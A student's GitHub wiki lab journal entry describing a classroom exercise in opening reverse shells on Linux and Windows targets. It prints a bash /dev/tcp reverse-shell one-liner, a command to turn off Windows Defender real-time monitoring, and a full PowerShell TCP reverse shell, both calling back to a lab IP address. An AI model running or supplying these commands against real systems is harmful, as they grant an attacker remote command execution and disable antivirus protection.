8.2 - JadenGil/Jaden-Tech-Journal GitHub Wiki

Deliverable 1:

When sshing into my account I had to use the command /bin/bash -i >& /dev/tcp/10.0.17.124/4449 0>&1

image

image

Deliverable 2:

Not sure why exactly I couldn't get this working. I am going to continue to trouble shoot but from what I've read these are the proper steps to follow.

image

Deliverable 3:

Doing the same thing on Windows is weird but it works.

First things first you must ALWAYS RUN AS ADMINISTRATOR otherwise it will not work

Make sure that you use the command Set-MpPreference -DisableRealtimeMonitoring $true it will not work otherwise

Then you want to COPY this command into CMD

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.124',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

image

This lab was a little confusing. It seemed like not all the steps would always work the way they should but it acted as a good learning experience if nothing else. It did help me a lot to understand how a person can use a PHP script to open a back door on a target of their choice (so long as that target has poor security like this did).